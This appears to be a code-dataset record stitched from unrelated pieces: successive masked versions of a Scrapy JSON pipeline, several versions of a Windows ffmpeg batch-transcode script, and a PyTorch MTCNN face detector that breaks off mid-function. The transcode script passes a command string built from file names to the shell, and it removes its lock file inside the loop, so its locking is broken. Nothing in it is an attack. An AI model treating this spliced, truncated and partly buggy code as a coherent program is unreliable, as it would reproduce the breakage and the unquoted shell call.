"step-2": "<mask token>\n\n\nclass OitYitikuscrapyDataPipeline(object):\n\n def open_spider(self, spider):\n path = 'D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime('%Y%m%d',\n time.localtime()))\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name + '.json', 'a', encoding\n ='utf-8')\n\n def process_item(self, item, spider):\n print('进程打印信息:', spider.name)\n lines = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n self.file.write(lines)\n return item\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass OitYitikuscrapyDataPipeline(object):\n\n def open_spider(self, spider):\n path = 'D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime('%Y%m%d',\n time.localtime()))\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name + '.json', 'a', encoding\n ='utf-8')\n\n def process_item(self, item, spider):\n print('进程打印信息:', spider.name)\n lines = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n self.file.write(lines)\n return item\n\n def close_spider(self, spider):\n self.file.close()\n",
"step-4": "import codecs\nimport time\nimport json\nimport os\n\n\nclass OitYitikuscrapyDataPipeline(object):\n\n def open_spider(self, spider):\n path = 'D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime('%Y%m%d',\n time.localtime()))\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name + '.json', 'a', encoding\n ='utf-8')\n\n def process_item(self, item, spider):\n print('进程打印信息:', spider.name)\n lines = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n self.file.write(lines)\n return item\n\n def close_spider(self, spider):\n self.file.close()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport codecs\nimport time\nimport json\nimport os\n\nclass OitYitikuscrapyDataPipeline(object):\n def open_spider(self, spider):\n path ='D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime(\"%Y%m%d\",time.localtime()))\n # path = 'd:\\\\OITData\\\\zujuan\\\\{0}\\\\{1}\\\\'.format(time.strftime(\"%Y%m%d\", time.localtime()), spider.name)\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name+'.json', 'a', encoding='utf-8')\n def process_item(self, item, spider):\n print('进程打印信息:',spider.name)\n lines = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n self.file.write(lines)\n return item\n\n def close_spider(self, spider):\n self.file.close()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
opt = (
'-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
)
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
                print('\nStart transcode [%s]' % path)
                _exec_transcode(path)
                print('Finish transcode [%s]' % path)
        os.remove(path_lock)
except FileExistsError as e:
print(e)
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_work_base(f_base):
re_num = re.compile('(\\d+)\\-.+')
r = re_num.search(f_base)
res = ''
if r:
print(r.group(1))
res = r.group(1)
else:
print('error... cant find f_base.')
return res
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
opt = (
'-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
)
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
                print('\nStart transcode [%s]' % path)
                _exec_transcode(path)
                print('Finish transcode [%s]' % path)
        os.remove(path_lock)
except FileExistsError as e:
print(e)
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_work_base(f_base):
re_num = re.compile('(\\d+)\\-.+')
r = re_num.search(f_base)
res = ''
if r:
print(r.group(1))
res = r.group(1)
else:
print('error... cant find f_base.')
return res
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
opt = (
'-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
)
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
                print('\nStart transcode [%s]' % path)
                _exec_transcode(path)
                print('Finish transcode [%s]' % path)
        os.remove(path_lock)
except FileExistsError as e:
print(e)
return
if __name__ == '__main__':
transcode()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
path_ffmpeg = 'C:\\work\\ffmpeg\\ffmpeg-3.4.2-win64-static\\bin\\ffmpeg.exe'
dir_ts_files = 'E:\\ts'
dir_output = 'E:\\hb'
path_lock = 'C:\\work\\ffmpeg\\encode.lock'
def get_work_base(f_base):
re_num = re.compile('(\\d+)\\-.+')
r = re_num.search(f_base)
res = ''
if r:
print(r.group(1))
res = r.group(1)
else:
print('error... cant find f_base.')
return res
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
opt = (
'-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
)
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
                print('\nStart transcode [%s]' % path)
                _exec_transcode(path)
                print('Finish transcode [%s]' % path)
        os.remove(path_lock)
except FileExistsError as e:
print(e)
return
if __name__ == '__main__':
transcode()
<|reserved_special_token_1|>
import os
import subprocess
import re
# import fcntl
# path_ffmpeg =
path_ffmpeg = r'C:\work\ffmpeg\ffmpeg-3.4.2-win64-static\bin\ffmpeg.exe'
dir_ts_files = r'E:\ts'
dir_output = r'E:\hb'
path_lock = r'C:\work\ffmpeg\encode.lock'
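# the lock file keeps a second encode run from starting; created in 'x' mode, removed on success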
def get_work_base(f_base):
re_num = re.compile(r'(\d+)\-.+')
r = re_num.search(f_base)
res = ''
if r:
print(r.group(1))
res = r.group(1)
else:
print('error... cant find f_base.')
return res
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
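    # encode settings: scale to 720px wide, yadif deinterlace, x264 CRF 27, 96k AAC, audio channelsplit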
#opt = '-i %(f_in)s -vf scale=720:-1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'
#opt = '-i %(f_in)s -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -g 1 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'
opt = '-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
#opt = '-i %(f_in)s -vf scale=840:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 26 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
# cmd = ' '.join([ffmpeg, f_in, f_out])
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
# res = subprocess.run([ffmpeg, enc_args], stdout=subprocess.PIPE)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
#return res
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
# [print(path) for path in os.listdir(dir_ts) if path.endswith('.ts')]
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
    # use a file lock to prevent multiple processes from running; open in 'x' mode (for Windows)
#os.remove(path_lock)
#return
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
                print('\nStart transcode [%s]' % path)
                _exec_transcode(path)
                print('Finish transcode [%s]' % path)
        os.remove(path_lock)
except FileExistsError as e:
        # print('could not acquire the lock... an encode is already running')
print(e)
return
# TODO
# lock the tmp-file; exit if the lock cannot be acquired.
# exit early if f_out already exists.
# delete f_in on successful completion.
# check the status of the .ts file (recording finished, or still in progress?).
# find .ts files and start encoding.
if __name__ == '__main__':
transcode()
|
flexible
|
{
"blob_id": "502e2d2222863236a42512ffc98c2cc9deaf454f",
"index": 7058,
"step-1": "<mask token>\n\n\ndef chk_tmp_file(f_tmp):\n pass\n\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n opt = (\n '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n )\n enc_args = opt % vars()\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\n\ndef del_files():\n pass\n\n\ndef itr_ts_files():\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\n\ndef transcode():\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n print(e)\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_work_base(f_base):\n re_num = re.compile('(\\\\d+)\\\\-.+')\n r = re_num.search(f_base)\n res = ''\n if r:\n print(r.group(1))\n res = r.group(1)\n else:\n print('error... cant find f_base.')\n return res\n\n\ndef chk_tmp_file(f_tmp):\n pass\n\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n opt = (\n '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n )\n enc_args = opt % vars()\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\n\ndef del_files():\n pass\n\n\ndef itr_ts_files():\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\n\ndef transcode():\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n print(e)\n return\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_work_base(f_base):\n re_num = re.compile('(\\\\d+)\\\\-.+')\n r = re_num.search(f_base)\n res = ''\n if r:\n print(r.group(1))\n res = r.group(1)\n else:\n print('error... cant find f_base.')\n return res\n\n\ndef chk_tmp_file(f_tmp):\n pass\n\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n opt = (\n '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n )\n enc_args = opt % vars()\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\n\ndef del_files():\n pass\n\n\ndef itr_ts_files():\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\n\ndef transcode():\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n print(e)\n return\n\n\nif __name__ == '__main__':\n transcode()\n",
"step-4": "<mask token>\npath_ffmpeg = 'C:\\\\work\\\\ffmpeg\\\\ffmpeg-3.4.2-win64-static\\\\bin\\\\ffmpeg.exe'\ndir_ts_files = 'E:\\\\ts'\ndir_output = 'E:\\\\hb'\npath_lock = 'C:\\\\work\\\\ffmpeg\\\\encode.lock'\n\n\ndef get_work_base(f_base):\n re_num = re.compile('(\\\\d+)\\\\-.+')\n r = re_num.search(f_base)\n res = ''\n if r:\n print(r.group(1))\n res = r.group(1)\n else:\n print('error... cant find f_base.')\n return res\n\n\ndef chk_tmp_file(f_tmp):\n pass\n\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n opt = (\n '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n )\n enc_args = opt % vars()\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\n\ndef del_files():\n pass\n\n\ndef itr_ts_files():\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\n\ndef transcode():\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n print(e)\n return\n\n\nif __name__ == '__main__':\n transcode()\n",
"step-5": "\n\nimport os\nimport subprocess\nimport re\n# import fcntl\n\n# path_ffmpeg = \npath_ffmpeg = r'C:\\work\\ffmpeg\\ffmpeg-3.4.2-win64-static\\bin\\ffmpeg.exe'\ndir_ts_files = r'E:\\ts'\ndir_output = r'E:\\hb'\npath_lock = r'C:\\work\\ffmpeg\\encode.lock'\n\ndef get_work_base(f_base):\n re_num = re.compile(r'(\\d+)\\-.+')\n r = re_num.search(f_base)\n res = ''\n if r:\n print(r.group(1))\n res = r.group(1)\n else:\n print('error... cant find f_base.')\n return res\n\ndef chk_tmp_file(f_tmp):\n pass\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n \n #opt = '-i %(f_in)s -vf scale=720:-1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'\n #opt = '-i %(f_in)s -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -g 1 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'\n opt = '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n #opt = '-i %(f_in)s -vf scale=840:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 26 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'\n enc_args = opt % vars()\n\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n\n # cmd = ' '.join([ffmpeg, f_in, f_out])\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n # res = subprocess.run([ffmpeg, enc_args], stdout=subprocess.PIPE)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n #return res\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\ndef del_files():\n pass\n\ndef itr_ts_files():\n # [print(path) for path in os.listdir(dir_ts) if path.endswith('.ts')]\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\ndef transcode():\n # 複数プロセス起動を防ぐためファイルロックを利用。x-modeでopen (for Windows)\n #os.remove(path_lock)\n #return\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n # print('ロックを獲得できませんでした... エンコード中')\n print(e)\n return\n\n\n# TODO\n# tmp-file をロック。できなければ終了。\n# f_out があれば、終了。\n# f_in を削除 (正常終了の場合)\n# ts ファイルのステータスチェック(録画済か録画中か?)\n# ts ファイルをみつけて、エンコード開始\n\n\nif __name__ == '__main__':\n transcode()\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
import numpy as np
import torch
import torch.nn as nn
from torch.nn.functional import interpolate
from torchvision.ops.boxes import batched_nms
class MTCNN():
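	# three-stage cascade: P-Net proposals -> R-Net refinement -> O-Net scores + landmarks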
def __init__(self, device=None, model=None):
if device is None:
device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.device = device
url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'
if model is None:
model = torch.hub.load_state_dict_from_url(url)
else:
model = torch.load(model, map_location=device)
self.pnet = PNet().to(device)
self.rnet = RNet().to(device)
self.onet = ONet().to(device)
self.pnet.load_state_dict(model['pnet'])
self.rnet.load_state_dict(model['rnet'])
self.onet.load_state_dict(model['onet'])
def detect(self, imgs, minsize=None):
if len(imgs) == 0:
return []
if isinstance(imgs[0], np.ndarray):
h, w = imgs[0].shape[:2]
else:
w, h = imgs[0].size
if minsize is None:
minsize = max(96 * min(w, h)/1080, 40)
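			# i.e. a 96px face at 1080p, scaled to this resolution, floored at 40px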
boxes, points = [], []
with torch.no_grad():
batches = [imgs[i:i+10] for i in range(0, len(imgs), 10)]
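			# run detection in chunks of 10 images to keep peak memory bounded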
for batch in batches:
batch_boxes, batch_points = detect_face(
batch, minsize, self.pnet, self.rnet, self.onet,
[0.7, 0.8, 0.9], 0.709, self.device)
boxes += list(batch_boxes)
points += list(batch_points)
result = []
for box, point in zip(boxes, points):
box = np.array(box)
point = np.array(point)
if len(box) == 0:
result.append(None)
else:
result.append((box[:, :4], box[:, 4], point))
return result
def empty_cache(device):
if 'cuda' in device:
with torch.cuda.device(device):
torch.cuda.empty_cache()
class PNet(nn.Module):
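	# stage 1: fully-convolutional proposal network (12x12 receptive field)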
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 10, kernel_size=3)
self.prelu1 = nn.PReLU(10)
self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)
self.conv2 = nn.Conv2d(10, 16, kernel_size=3)
self.prelu2 = nn.PReLU(16)
self.conv3 = nn.Conv2d(16, 32, kernel_size=3)
self.prelu3 = nn.PReLU(32)
self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)
self.softmax4_1 = nn.Softmax(dim=1)
self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)
def forward(self, x):
x = self.conv1(x)
x = self.prelu1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.prelu2(x)
x = self.conv3(x)
x = self.prelu3(x)
a = self.conv4_1(x)
a = self.softmax4_1(a)
b = self.conv4_2(x)
return b, a
class RNet(nn.Module):
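	# stage 2: refinement network; classifies and regresses 24x24 crops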
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 28, kernel_size=3)
self.prelu1 = nn.PReLU(28)
self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)
self.conv2 = nn.Conv2d(28, 48, kernel_size=3)
self.prelu2 = nn.PReLU(48)
self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)
self.conv3 = nn.Conv2d(48, 64, kernel_size=2)
self.prelu3 = nn.PReLU(64)
self.dense4 = nn.Linear(576, 128)
self.prelu4 = nn.PReLU(128)
self.dense5_1 = nn.Linear(128, 2)
self.softmax5_1 = nn.Softmax(dim=1)
self.dense5_2 = nn.Linear(128, 4)
def forward(self, x):
x = self.conv1(x)
x = self.prelu1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.prelu2(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.prelu3(x)
x = x.permute(0, 3, 2, 1).contiguous()
x = self.dense4(x.view(x.shape[0], -1))
x = self.prelu4(x)
a = self.dense5_1(x)
a = self.softmax5_1(a)
b = self.dense5_2(x)
return b, a
class ONet(nn.Module):
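	# stage 3: output network on 48x48 crops; also predicts 5 facial landmarks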
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3)
self.prelu1 = nn.PReLU(32)
self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)
self.conv2 = nn.Conv2d(32, 64, kernel_size=3)
self.prelu2 = nn.PReLU(64)
self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3)
self.prelu3 = nn.PReLU(64)
self.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)
self.conv4 = nn.Conv2d(64, 128, kernel_size=2)
self.prelu4 = nn.PReLU(128)
self.dense5 = nn.Linear(1152, 256)
self.prelu5 = nn.PReLU(256)
self.dense6_1 = nn.Linear(256, 2)
self.softmax6_1 = nn.Softmax(dim=1)
self.dense6_2 = nn.Linear(256, 4)
self.dense6_3 = nn.Linear(256, 10)
def forward(self, x):
x = self.conv1(x)
x = self.prelu1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.prelu2(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.prelu3(x)
x = self.pool3(x)
x = self.conv4(x)
x = self.prelu4(x)
x = x.permute(0, 3, 2, 1).contiguous()
x = self.dense5(x.view(x.shape[0], -1))
x = self.prelu5(x)
a = self.dense6_1(x)
a = self.softmax6_1(a)
b = self.dense6_2(x)
c = self.dense6_3(x)
return b, c, a
def detect_face(imgs, minsize, pnet, rnet, onet, threshold, factor, device):
if isinstance(imgs, (np.ndarray, torch.Tensor)):
imgs = torch.as_tensor(imgs, device=device)
if len(imgs.shape) == 3:
imgs = imgs.unsqueeze(0)
else:
if not isinstance(imgs, (list, tuple)):
imgs = [imgs]
if any(img.size != imgs[0].size for img in imgs):
raise Exception("MTCNN batch processing only compatible with equal-dimension images.")
imgs = np.stack([np.uint8(img) for img in imgs])
imgs = torch.as_tensor(imgs, device=device)
model_dtype = next(pnet.parameters()).dtype
imgs = imgs.permute(0, 3, 1, 2).type(model_dtype)
batch_size = len(imgs)
h, w = imgs.shape[2:4]
m = 12.0 / minsize
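	# P-Net detects 12x12 faces, so scale the image until minsize faces map to 12px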
minl = min(h, w)
minl = minl * m
# Create scale pyramid
scale_i = m
scales = []
while minl >= 12:
scales.append(scale_i)
scale_i = scale_i * factor
minl = minl * factor
# First stage
boxes = []
image_inds = []
all_inds = []
all_i = 0
for scale in scales:
im_data = imresample(imgs, (int(h * scale + 1), int(w * scale + 1)))
im_data = (im_data - 127.5) * 0.0078125
reg, probs = pnet(im_data)
empty_cache(device)
boxes_scale, image_inds_scale = generateBoundingBox(reg, probs[:, 1], scale, threshold[0])
boxes.append(boxes_scale)
image_inds.append(image_inds_scale)
all_inds.append(all_i + image_inds_scale)
all_i += batch_size
boxes = torch.cat(boxes, dim=0)
image_inds = torch.cat(image_inds, dim=0).cpu()
all_inds = torch.cat(all_inds, dim=0)
# NMS within each scale + image
pick = batched_nms(boxes[:, :4], boxes[:, 4], all_inds, 0.5)
boxes, image_inds = boxes[pick], image_inds[pick]
# NMS within each image
pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)
boxes, image_inds = boxes[pick], image_inds[pick]
regw = boxes[:, 2] - boxes[:, 0]
regh = boxes[:, 3] - boxes[:, 1]
qq1 = boxes[:, 0] + boxes[:, 5] * regw
qq2 = boxes[:, 1] + boxes[:, 6] * regh
qq3 = boxes[:, 2] + boxes[:, 7] * regw
qq4 = boxes[:, 3] + boxes[:, 8] * regh
boxes = torch.stack([qq1, qq2, qq3, qq4, boxes[:, 4]]).permute(1, 0)
boxes = rerec(boxes)
y, ey, x, ex = pad(boxes, w, h)
# Second stage
if len(boxes) > 0:
im_data = []
for k in range(len(y)):
if ey[k] > (y[k] - 1) and ex[k] > (x[k] - 1):
img_k = imgs[image_inds[k], :, (y[k] - 1):ey[k], (x[k] - 1):ex[k]].unsqueeze(0)
im_data.append(imresample(img_k, (24, 24)))
